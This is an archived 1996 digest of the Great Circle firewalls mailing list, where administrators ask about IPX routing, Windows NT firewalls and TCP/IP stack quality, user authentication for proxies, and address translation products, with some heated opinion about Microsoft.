- scott barman From firewalls-owner Wed Feb 7 08:55:11 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA12760 for firewalls-outgoing; Wed, 7 Feb 1996 08:18:23 -0800 (PST) Received: from tuna.wang.com (tuna.wang.com [150.124.136.4]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA12746 for ; Wed, 7 Feb 1996 08:18:16 -0800 (PST) Received: from mail.wangfed.com (ns.wangfed.com [159.94.10.19]) by tuna.wang.com (8.6.12/8.6.12tf1) with SMTP id LAA26781 for ; Wed, 7 Feb 1996 11:17:27 -0500 Received: from [159.94.10.15] by mail.wangfed.com (1.37.109.4/A.09.00a) id AA29082; Wed, 7 Feb 96 11:08:26 -0600 Received: from [159.94.14.48] by hfsi (BULL 5.61++/B.O.S 02.01) id AA10205; Wed, 7 Feb 96 11:05:02 -0500 Date: Wed, 7 Feb 96 11:05:02 -0500 Message-Id: <9602071605.AA10205@hfsi> From: "KM" Reply-To: "KM" To: firewalls@GreatCircle.COM Subject: Re: Survey Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In message <199602061540.KAA18136@Fe3.rust.net> "Kenneth J. Stephens" writes: > If the magazine publishers forced the issue date onto all of their reprints > the vendors would have little use for the reprints. The date stamp would > obsolete > the reprint so quickly that the vendor would look foolish for distributing > old info. One of the hazards of a dynamic industry. So what you're saying is that the publishers, in collusion with the vendors, are being dishonest by omission. Why doesn't this suprise me? ------------------------------------------------------ Karen Goertzel Manager, International Programmes and Special Projects Secure Systems and Services Operation Wang Federal, Inc. 7900 Westpark Drive - MS 700 McLean, Virginia 22102-4299 TEL: 703-827 3914 FAX: 703-827 3161 goertzek@wangfed.com http://www.wangfed.com +------------------------------+ | It infuriates me to be wrong | | when I know I'm right. 
| | -- Moliere | +------------------------------+ From firewalls-owner Wed Feb 7 09:09:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA13097 for firewalls-outgoing; Wed, 7 Feb 1996 08:24:18 -0800 (PST) Received: from usia.gov (XGATE.USIA.GOV [198.67.64.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA13087 for ; Wed, 7 Feb 1996 08:24:12 -0800 (PST) Received: from NetWare MHS (SMF70) by usia.gov via Connect2-SMTP 4.00; Wed, 7 Feb 96 11:24:03 -0500 Message-ID: <88C818310136C8D1@usia.gov> In-Reply-To: <0A1F09310136C8D1> Date: Wed, 7 Feb 96 11:19:33 -0500 From: "Lehrer, Neil" Organization: USIA To: firewalls@greatcircle.com Subject: ipx routing X-mailer: Connect2-SMTP 4.00 MHS to SMTP Gateway Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Subject: Re IPX routing paul.carrol@medaphis.com offered up: >I am about to setup a firewall for our Internet link. > >I have recently learned that we are bringing in an X.25 line from Compuserve. >The line runs into a Compuserve box that resides here that we do NOT control. > >From the Compuserve box, a line runs into one of our router interfaces. > >Obviously, I want to firewall this link as well... >It passes IPX and TCP/IP, and needs to do both. > >The problem I have is with IPX. We have decided on Raptor Eagle as our firewall. >It will run on a SUN Sparc 20, and it will NOT pass IPX. > >Any suggestions? Well .. not sure whether this works or not, but I'd be interested in comments myself. Is IPX critical for you ? I ask because we're running IP and IPX on our LAN here, and I'm being pushed to allow both across our firewalling mechanism. Our Netware guy said to me the other day that we needed IPX as some products actually require IPX in order to work. This sounds like snake oil to me - I'd have thought that the underlying protocol - whether IP or IPX should make no difference whatsoever. 
Any comments on this ? It's also been suggested to me that Novell/IP works by simply encapsulating IPX within an IP packet - this doesn't quite sound like full IP to me. Can anyone comment upon this ? If we can move everything to IP, then our problems potentially disappear here, and I needn't route IPX at all. Sound easy to me from there (ish!). I wonder Paul, whether you could do something along these lines ? I wonder everyone whether you all think I'm pouring snake oil around the place too ? :) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` it is true that some netware products use ipx/spx directly. whether they would work properly, or at all, with netware/ip is something you would have to test (unfortunately). Regards +++++++++++++++++++++++++++++++++++++++ + Neil Lehrer + U.S. Information Agency + Networks and Systems Support Division + + voice 202 619-0903 + fax 202 619-3883 + internet nlehrer@usia.gov + + "oh what a tangled net we weave + when we seek to retrieve." + +++++++++++++++++++++++++++++++++++++++ From firewalls-owner Wed Feb 7 09:24:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA14114 for firewalls-outgoing; Wed, 7 Feb 1996 08:41:56 -0800 (PST) Received: from server1.startel.com.ar ([200.26.1.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA14083 for ; Wed, 7 Feb 1996 08:41:43 -0800 (PST) Received: from [200.26.8.62] (ts1-ppp15.starnet.net.ar) by server1.startel.com.ar with SMTP id AA18039 (5.67b/IDA-1.4.4 for ); Wed, 7 Feb 1996 13:37:32 +0300 Message-Id: <199602071037.AA18039@server1.startel.com.ar> To: "firewalls@GreatCircle.com" Subject: DNS for NT Date: Thu, 08 Feb 96 13:41:42 -0500 From: Eduardo Torres X-Mailer: E-Mail Connection v2.5.03 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk -- [ From: Eduardo Torres * EMC.Ver #2.5.02 ] -- Can anyone recommend a good DNS solution for NT? 
Thank you, Eduardo -- ------------------------------------------- Eduardo Jose Torres STARTEL S.A. Marketing - Internet Leandro N. Alem 628 2do Piso 1001 Buenos Aires Argentina Tel: 54-1-318-6000 Fax: 54-1-318-6376 ------------------------------------------- From firewalls-owner Wed Feb 7 09:53:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA14283 for firewalls-outgoing; Wed, 7 Feb 1996 08:45:32 -0800 (PST) Received: from wizard.pn.com (wizard.pn.com [204.96.36.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA14261 for ; Wed, 7 Feb 1996 08:45:25 -0800 (PST) Received: from synaxis.com (mail.synaxis.com [204.96.42.66]) by wizard.pn.com (8.6.12) with SMTP id LAA04098 for ; Wed, 7 Feb 1996 11:44:36 -0500 Received: from Synaxis-Message_Server by synaxis.com with Novell_GroupWise; Wed, 07 Feb 1996 11:43:10 -0500 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Wed, 07 Feb 1996 11:19:29 -0500 From: Chris Jenkins To: doug@fc.com, firewalls@GreatCircle.COM Subject: NT Firewalls/Web Servers -Reply Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Raptor Systems makes a one of the only firewall products I know of for NT. I will be gettin an eval in to test it out... Chris Jenkins cjenkins@synaxis.com >>> Douglas M. Todd, Jr. 02/07/96 09:06am >>> Does anyone know of any good NT Firewalls and Web Servers? ==DMT> -- >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >Douglas M. Todd, Jr. fc.com, Inc. 
One Federal Street BLD 102 Springfield, MA 01105 PHN: 413-733-7333 FAX: 413-733-7725 Email: Doug@fc.com or Bunyan@msn.com From firewalls-owner Wed Feb 7 09:57:12 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA13341 for firewalls-outgoing; Wed, 7 Feb 1996 08:28:17 -0800 (PST) Received: from Disclosure.COM (di2.disclosure.com [205.156.194.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA13317 for ; Wed, 7 Feb 1996 08:28:08 -0800 (PST) Received: by Disclosure.COM (4.1/SMI-4.1) id AA19351; Wed, 7 Feb 96 11:30:27 EST Date: Wed, 7 Feb 1996 11:30:25 -0500 (EST) From: Scott Barman To: Russ Cc: "'Jeromie Jackson'" , "'Firewalls'" Subject: RE: NT's TCP/IP stack In-Reply-To: <01BAF4F6.E8D957C0@rwcooper.RC.Toronto.on.ca> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 7 Feb 1996, Russ wrote: > [Firewall relevance] > To some extent, there may be some relief to all of this on the horizon. > With the introduction of Raptor and soon Network-1 into the Windows NT > realm of Firewalls, there are seriously security conscious individuals who > will have to track these changes to see if they affect their product. > Hopefully this will lead to increased scrutiny of the product from a > specifically secure standpoint. There are three firewall built on top of NT, not including the vaporware Micro$haft themselves are touting. I have been in contact with someone who has evaluated two of them. Unfortunatly, I cannot say who or give further details (this person will be publishing this information in one of the "major" industry rags), but let's just say that my suspicion has been confirmed: you cannot use these systems for anything faster than a 64Kbps connection. T1, or even fractional T1 (128Kbps), start showing failture. 
> [Shameless plug] > Of course, with the just announced strategic partnership between MCI and > Microsoft (and of course, SHL), and the fact that MCI will be hosting MSN > on the Internet, we will hopefully see lots more NT boxes on the Internet, > again, forcing people to look more closely at the viability of securing NT > boxes. Maybe Micro$loth is hoping Vint Cerf will help their sagging system. Then again companies are into prostitution for the sake of the bottom line--read "On the Line" regarding this statement and MCI. Hopefully, when folks put NT on the internet, they will find the same thing I found through experimentation: it has multitasking that can't get out of its own way, it can't handle the load of a medium-low environment, and if something goes wrong, there isn't a quick interface to fix things (by passing that maze of twisty little menus all different!). > There's definitely something wrong with someone like me who lives for these > types of questions, I guess I just love the controversy! ;-] Yea, it's called living the hype and beliving the b.s. from marketing machines. No controversy here--especially when I don't believe what I read or hear from know M.$.... err... b.s. artists. scott barman -- scott barman DISCLAIMER: I speak to anyone who will listen, scott@disclosure.com and I speak only for myself. barman@ix.netcom.com "Micro$oft and Windoze/NT will be the cause of the de-evolution of network security just as the original PC and BASIC was the cause of the de-evolution of programming." 
- scott barman From firewalls-owner Wed Feb 7 10:01:54 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA14528 for firewalls-outgoing; Wed, 7 Feb 1996 08:52:08 -0800 (PST) Received: from wizard.pn.com (wizard.pn.com [204.96.36.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA14522 for ; Wed, 7 Feb 1996 08:52:00 -0800 (PST) Received: from synaxis.com (mail.synaxis.com [204.96.42.66]) by wizard.pn.com (8.6.12) with SMTP id LAA04470 for ; Wed, 7 Feb 1996 11:51:06 -0500 Received: from Synaxis-Message_Server by synaxis.com with Novell_GroupWise; Wed, 07 Feb 1996 11:49:52 -0500 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Wed, 07 Feb 1996 11:26:12 -0500 From: Chris Jenkins To: winnt-l@eva.dc.lsoft.com, jeromie@garrison.com, firewalls@greatcircle.com, SATEESHB@inf.com Subject: Re: NT's TCP/IP stack + NetManage NEWT conflict. -Reply Sender: firewalls-owner@GreatCircle.COM Precedence: bulk all of the newest (and even WFW311) come with a free TCPIP stack. Third party applications like Chameleon, LanWorkPlace, etc....come with their own stacks. In most cases, you should be able to get applications (Telnet, FTP, mail, etc) from one third-party product to work over anothers TCP/IP stack. This is where the WINSOCK standard comes in. More specialized TCP/IP functions running on Windows (such as XServer, 3270, etc) may require a stack/Winsock specific to that particular product. Since MS gives you TCP/IP and WINSOCK, most third party applications should be able to run. If I recall correctly, I think that some of Chameleons applications will run on MS tcp/ip stack. Anyway......jsut been my experience Chris Jenkins cjenkins@synaxis.com >>> SATEESHB 02/07/96 08:07am >>> well, I don't know how relevant is the reply to your needs. I faced problems with NetManage Chameleon version 5.0 .It starts a program called NEWT(NetManage Enhanced Windows Tcp/IP). 
When I try to run one of my programs which is a service from service control panel, it hangs.Even that cute messagebox "Attempting to start Service " with the small clock also doesn't come up. After wasting many hours and losing sleep, I found out that if I rename NEWT.exe to some other name so it would fail to get loaded automatically, the SCM behaves properly. I feel, NEWT tcp/ip might be conflicting with NT TCP/IP. Why should NetManage guys have a different program for this when NT provides one is beyond my comprehension. It would be of help to me if some one can tell me how is Service Control Manager is related to TCP/IP here?.(Is it something to do with RPC stuff they talk about for starting services remotely?.In my case I started locally). Any discussion on NT TCP/IP stack will be greatly appreciated. Regards, Sateesh Babu N S, Systems Analyst, Infosys Technologies Ltd, Bangalore India. ______________________________ Reply Separator _________________________________ Subject: NT's TCP/IP stack Author: jeromie@garrison.com (Jeromie Jackson) at SMTP_GW Date: 2/6/96 7:03 PM As we have all seen in the last few weeks, there have been several people who have been ragging on Windows NT TCP/IP stack. I would like to hear some comments on real problems that have been detected. I have looked around the net, although no hard-fact information could I find. NT appears to have some good qualities, ease-of-use, although I am unsure about several things. The integrity of the OS. Nobody can test it well. Who's to say what holes are under the hood that nobody has a good chance to look at. The TCP/IP stack has been said to have problems. They are not a security company, therefore I am very unwilling to assume they have done the proper testing for security purposes. For that matter, I am unwilling to assume the product isn't full of "Microsoft Features" that are undocumented.. I would be very interested in hearing about these issues. 
Jeromie Jackson Director of Technology Garrison Associates jeromie@garrison.com From firewalls-owner Wed Feb 7 10:06:16 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA15908 for firewalls-outgoing; Wed, 7 Feb 1996 09:30:30 -0800 (PST) Received: from smtp-gw01.ny.us.ibm.net ([165.87.194.252]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA15903 for ; Wed, 7 Feb 1996 09:30:26 -0800 (PST) From: pcuser@slip133-140.dc.us.ibm.net Received: (from uucp@localhost) by smtp-gw01.ny.us.ibm.net (8.6.9/8.6.9) id RAA79113 for <@smtp-gw01.ny.us.ibm.net:firewalls@greatcircle.com>; Wed, 7 Feb 1996 17:29:37 GMT Message-Id: <199602071729.RAA79113@smtp-gw01.ny.us.ibm.net> Received: from slip133-140.dc.us.ibm.net(129.37.133.140) by smtp-gw01.ny.us.ibm.net via smap (V1.3mjr) id smaiNwCKs; Wed Feb 7 17:29:26 1996 Date: Tue, 6 Feb 96 10:04:23 PST Subject: Firewalls Product Comparison To: @smtp-gw01.ny.us.ibm.net:firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi guys, I need to prepare a comparative study between Sunīs Firewall 1 and IBM NetSP, for the end of this week. Does anyone Knows where I could find some interesting articles concerning both of these products?? Any help woul be appreciated. 
Wilmer Caripe EMSCA - ENGINEERING AND MANUFACTURING SYSTEMS CARACAS, VENEZUELA From firewalls-owner Wed Feb 7 10:08:51 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA15536 for firewalls-outgoing; Wed, 7 Feb 1996 09:20:20 -0800 (PST) Received: from arthur.crpht.lu (arthur.crpht.lu [158.64.4.8]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA15531 for ; Wed, 7 Feb 1996 09:20:09 -0800 (PST) Received: from cnsmac1.crpht.lu by arthur.crpht.lu with SMTP (1.37.109.4/16.2) id AA15004; Wed, 7 Feb 96 18:18:54 +0100 X-Sender: security@arthur.crpht.lu Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 7 Feb 1996 18:24:43 +0100 To: firewalls-digest@GreatCircle.COM From: security@crpht.lu (Bruno MAMER) Subject: Firewall, yes, but policy first ! Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi everyone, Just a small question, last August, "Jim Carroll" talked of the book "Information Security Policies Made Easy". We've decided to buy it but lack references. Does anyone have the editor, ISBN number ? TIA Bruno _________________________________________________________________________ Bruno MAMER bruno.mamer@crpht.lu Centre de Recherche Public Henri Tudor Computing and Network Services Our local archive on security : http://www.crpht.lu/CNS/html/PubServ/Security/security-home.html ------------------------------------------------------------------------- From firewalls-owner Wed Feb 7 10:38:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA18861 for firewalls-outgoing; Wed, 7 Feb 1996 10:23:46 -0800 (PST) Received: from garrison.com. (garrison.garrison.com [199.1.78.14]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA18846 for ; Wed, 7 Feb 1996 10:23:38 -0800 (PST) Received: by garrison.com. 
(4.1/Nutered Mailer) id AA05279; Wed, 7 Feb 96 12:20:27 CST Date: Wed, 7 Feb 96 12:20:27 CST From: jeromie@garrison.com (Jeromie Jackson) Message-Id: <9602071820.AA05279@garrison.com.> To: firewalls@greatcircle.com, zuhn@sctc.com Subject: Re: User level firewall / proxy authentication Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > // > Are there any firewall or proxy server products available that will allow > // > outgoing user authentication based upon a user id, rather than an IP > // > address? > As for the safety, there are usually a variety of means available for user > authentication. Those I have seen in the market range from insecure > username & reusable passwords (a la Unix passwords) to software based > challenge-response systems (LOCKout or S/Key) to hardware based token > cards of some form or another (SecurID, SNK). A common tradeoff in > authentication systems is price vs. unspoofability. The one thing to remember is that when using One-Time Password products is that only the inital login converstation is authenticated. If a user authenticates himself to a machine, and then starts a session he is still vulerable to hijacks, sniffing & spoofing. If you were to use an encryption device such as the Persona card, or the Smartcat product, or Cryptocard, you will have continual authentication & confidentiality. This continual encryption will patch up the above mentioned weaknesses that OTP products do not address. 
Jeromie Jackson Garrison Technologies jeromie@garrison.com From firewalls-owner Wed Feb 7 11:14:09 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA20417 for firewalls-outgoing; Wed, 7 Feb 1996 10:48:22 -0800 (PST) Received: from netcom.netcom.com (netcom.netcom.com [192.100.81.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA20410 for ; Wed, 7 Feb 1996 10:48:17 -0800 (PST) Received: by netcom.netcom.com (8.6.12/Netcom) id KAA29708; Wed, 7 Feb 1996 10:05:05 -0800 Date: Wed, 7 Feb 1996 10:04:59 -0800 (PST) From: Bob Bosen Subject: Re: User level firewall / proxy authentication To: Graham Jose cc: "firewalls@GreatCircle.COM" In-Reply-To: <3117F7B3.3647@mecx05.colesmyer.com.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 7 Feb 1996, Graham Jose wrote: > Are there any firewall or proxy server products available that will allow > outgoing user authentication based upon a user id, rather than an IP address? > > Our users are mobile and this makes it difficult to restrict internet access on a > per user basis, since their source IP address is likely to change. > > Thanks, > > Graham > -- > Graham Jose, Technical Analyst, Information Systems Security > Retail Technology Services, Coles Myer Limited (Australia) > Voice: +613 9483 7613 Email: gjose@mecx05.colesmyer.com.au > Most existing firewall products can be supplemented with an interface to some kind of enhanced user authentication. This may use a published protocol such as XTACACS, TACACS+, RADIUS, or (our own) EASSP, or it may use a proprietary protocol. Most of the enhanced user authentication vendors market some kind of authentication server(s) that include (at least) a proprietary API or (hopefully) one or more published APIs and/or support one or more of the aforementioned protocols. 
You can obtain free authentication protocol server daemons supporting the aforementioned protocols from several of the more popular vendors of routers and commservers and firewalls. When you are thinking about authenticating user identity on the Internet, make sure your implementation is non-replayable. Stealing memorized passwords would be your biggest threat otherwise. Our anonymous ftp archives have a lot of this stuff. Regards, Bob Bosen Enigma Logic Inc. 2151 Salvio St. #301 Concord, CA 94520 USA Tel: +1 510 827-5707 Internet: bbosen@netcom.com http://www.safeword.com ftp://ftp.safeword.com/download/ or ftp://ftp.enigmalogic.com ************************************************************************** * "It wasn't me!!! Somebody must have captured my username/password!!!" * ************************************************************************** From firewalls-owner Wed Feb 7 12:19:28 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA23583 for firewalls-outgoing; Wed, 7 Feb 1996 11:33:42 -0800 (PST) Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA23574 for ; Wed, 7 Feb 1996 11:33:29 -0800 (PST) Received: from cixgate by relay2.UU.NET with SMTP id QQabxu25738; Wed, 7 Feb 1996 14:31:13 -0500 (EST) Received: from manzanita.DEV.3Com.COM.noname ([139.87.180.206]) by cixgate (4.1/SMI-4.1/3com-cixgate-GCA-931027-01) id AA20468; Wed, 7 Feb 96 11:40:29 PST Received: by manzanita.DEV.3Com.COM.noname (4.1/SMI-4.1) id AA00903; Wed, 7 Feb 96 11:25:07 PST Date: Wed, 7 Feb 96 11:25:07 PST From: bobk@manzanita.DEV.3Com.COM (Bob Konigsberg) Message-Id: <9602071925.AA00903@manzanita.DEV.3Com.COM.noname> To: firewalls@greatcircle.com Subject: Cost of Address Translation systems Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Can anyone give me the costs (hardware and software) for address translation systems. Hopefully along with their names. 
Thanks, BobK From firewalls-owner Wed Feb 7 13:09:10 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA28114 for firewalls-outgoing; Wed, 7 Feb 1996 12:49:21 -0800 (PST) Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id MAA28103 for ; Wed, 7 Feb 1996 12:49:16 -0800 (PST) From: long-morrow@CS.YALE.EDU Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU (8.7.1/res.host.cf-4.0) with ESMTP id PAA09349; Wed, 7 Feb 1996 15:48:13 -0500 (EST) sender long-morrow@CS.YALE.EDU for Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.7.1/res.client.cf-4.0) id PAA05677; Wed, 7 Feb 1996 15:48:11 -0500 (EST) Date: Wed, 7 Feb 1996 15:48:11 -0500 (EST) Message-Id: <199602072048.PAA05677@SPARKY.CF.CS.YALE.EDU> To: doug@fc.com, firewalls@GreatCircle.COM Subject: Re: NT Firewalls/Web Servers Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Doug@fc.com wrote: >Does anyone know of any good NT Firewalls and Web Servers? Have you looked at WinGate? It is a proxying system for Windows 95 and NT which allows you to use one machine which dials up an ISP to act as a proxy for your entire network. It can also straddle two ethernets instead. They have proxies similar to TIS FWTK, a nice generic proxy with flexible configuration rules, a SOCKS implementation. There are a number of different good Web Servers for NT (Netscape's, Microsoft's, O'Reilly & Assoc. 
WebSite, etc.): http://home.netscape.com/ http://www.microsoft.com/ http://website.ora.com/ - Morrow From firewalls-owner Wed Feb 7 13:31:51 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA23659 for firewalls-outgoing; Wed, 7 Feb 1996 11:35:06 -0800 (PST) Received: from foxtrot.worldcom.com (foxtrot.worldcom.com [198.64.193.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA23644 for ; Wed, 7 Feb 1996 11:34:49 -0800 (PST) Received: (from smtp@localhost) by foxtrot.worldcom.com (8.7.1/8.6.9) id NAA19803 for ; Wed, 7 Feb 1996 13:24:34 -0600 (CST) Received: from samba.worldcom.com(198.64.193.32) by foxtrot.worldcom.com via smap (V1.3) id sma019734; Wed Feb 7 13:23:53 1996 Received: (smtp@localhost) by samba.worldcom.com (8.6.11/8.6.9) id NAA08549 for ; Wed, 7 Feb 1996 13:23:51 -0600 Received: from samba.worldcom.com(198.64.193.32) by samba.worldcom.com via smap (V1.3) id sma008544; Wed Feb 7 13:23:28 1996 Date: Wed, 7 Feb 1996 13:23:28 -0600 (CST) From: Robert Dana Reply-To: Robert Dana Subject: I want details!!! Re: NT's TCP/IP stack To: firewalls@greatcircle.com In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk OK, I'm getting really frustrated about the lack of details about NT's deficiencies. I couldn't care less about OS bigotry- I'll use whatever systems meet my needs (which often include security). I have seen, over and over again, posts that basically say "I've personally verified that NT sucks for {security, networking, multitasking, Internet services}. Don't believe the MS marketing hype". 
For example: Scott Barman writes: > Hopefully, when folks put NT on the internet, they will find the same > thing I found through experimentation: it has multitasking that can't > get out of its own way, it can't handle the load of a medium-low > environment, and if something goes wrong, there isn't a quick interface > to fix things (by passing that maze of twisty little menus all > different!). [...] > Yea, it's called living the hype and believing the b.s. from marketing > machines. No controversy here--especially when I don't believe what I > read or hear from know M.$.... err... b.s. artists. I don't mean to single Scott out- his is just the most recent example. We can bitch about MS's unsubstantiated marketing claims all we want, but making similarly unsubstantiated claims opposing them doesn't help at all. Exactly what are the deficiencies of the IP or TCP implementations of NT for the environment most of us care about (IP over ethernet)? Why won't a firewall on NT be capable of handling a connection faster than 64k? One of the most valuable things about forums like this is the potential to share information that cuts through all the BS that floats around out there in the form of marketing materials and vendor-biased trade publications. I'm constantly disappointed about how little valuable knowledge is really posted. And please- keep your OS religion to yourself. Sure, UNIX is what I'm most comfortable with for now, but that doesn't change the fact that I have to deal with NT whether I want to or not. GIVE US FACTS. 
-Robert -- Robert Dana (713) 650-6522 x240 Director of Network Services WorldCom, the International Network for Lotus Notes From firewalls-owner Wed Feb 7 13:39:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA29407 for firewalls-outgoing; Wed, 7 Feb 1996 13:16:19 -0800 (PST) Received: from eagle.wd.cubic.com ([149.63.94.9]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA29402 for ; Wed, 7 Feb 1996 13:16:15 -0800 (PST) Received: (mischler@localhost) by eagle.wd.cubic.com (8.6.9/8.3) id NAA08977; Wed, 7 Feb 1996 13:15:20 -0800 Date: Wed, 7 Feb 1996 13:15:20 -0800 From: Dave Mischler Message-Id: <199602072115.NAA08977@eagle.wd.cubic.com> To: bobk@manzanita.DEV.3Com.COM, firewalls@GreatCircle.COM Subject: Re: Cost of Address Translation systems Sender: firewalls-owner@GreatCircle.COM Precedence: bulk IPRoute runs on a PC and is shareware for $50. http://www.mischler.com/iproute/ From firewalls-owner Wed Feb 7 13:42:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA29452 for firewalls-outgoing; Wed, 7 Feb 1996 13:17:24 -0800 (PST) Received: from count04.mry.scruznet.com (count04.mry.scruznet.com [204.147.227.68]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id NAA29443 for ; Wed, 7 Feb 1996 13:17:17 -0800 (PST) From: firewalls@count04.mry.scruznet.com Received: from count04.mry.scruznet.com (localhost [127.0.0.1]) by count04.mry.scruznet.com (8.7.3/8.7.1) with ESMTP id NAA04755; Wed, 7 Feb 1996 13:09:56 -0800 (PST) Message-Id: <199602072109.NAA04755@count04.mry.scruznet.com> To: bobk@manzanita.DEV.3Com.COM (Bob Konigsberg) cc: firewalls@GreatCircle.COM, firewalls@count04.mry.scruznet.com Subject: Re: Cost of Address Translation systems In-reply-to: Your message of "Wed, 07 Feb 1996 11:25:07 PST." 
<9602071925.AA00903@manzanita.DEV.3Com.COM.noname> Date: Wed, 07 Feb 1996 13:09:56 -0800 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk try darren reed... he's on the list with ip-filter 3.02b; it has the feature you are requesting From firewalls-owner Wed Feb 7 14:16:47 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA01538 for firewalls-outgoing; Wed, 7 Feb 1996 13:52:15 -0800 (PST) Received: from relay2.smtp.psi.net (relay2.smtp.psi.net [38.8.188.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA01533; Wed, 7 Feb 1996 13:52:10 -0800 (PST) Received: from radisys.radisys.com by relay2.smtp.psi.net (8.6.12/SMI-5.4-PSI) id QAA22881; Wed, 7 Feb 1996 16:50:50 -0500 Received: from msmail.radisys.com by radisys.radisys.com id aa01808; 7 Feb 96 13:46 PST Received: by msmail.radisys.com with Microsoft Mail id <31191E61@msmail.radisys.com>; Wed, 07 Feb 96 13:49:21 PST From: Jesse Gambetti To: firewalls-owner Cc: firewalls Subject: Firewall Date: Wed, 07 Feb 96 13:48:00 PST Message-ID: <31191E61@msmail.radisys.com> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Our company is currently running a SCO box as our gateway w/ a netblazer doing packet filtering and a 14.4k link to the net. I've taken over internet as one of my primary responsibilities here and, working with the engineers that maintained the inet access here before, we've decided to switch to BSDi on our gateway; we ordered a CISCO firewall router that will support a new 256k partial frame t1. Being new to firewalls myself I'm kind of reading as much as I can while learning the admin side of BSDi. My question is this: will the Cisco router provide enough security for our company? We are starting to become very concerned with security. If you need any other info I'll be happy to provide it if I know it. 
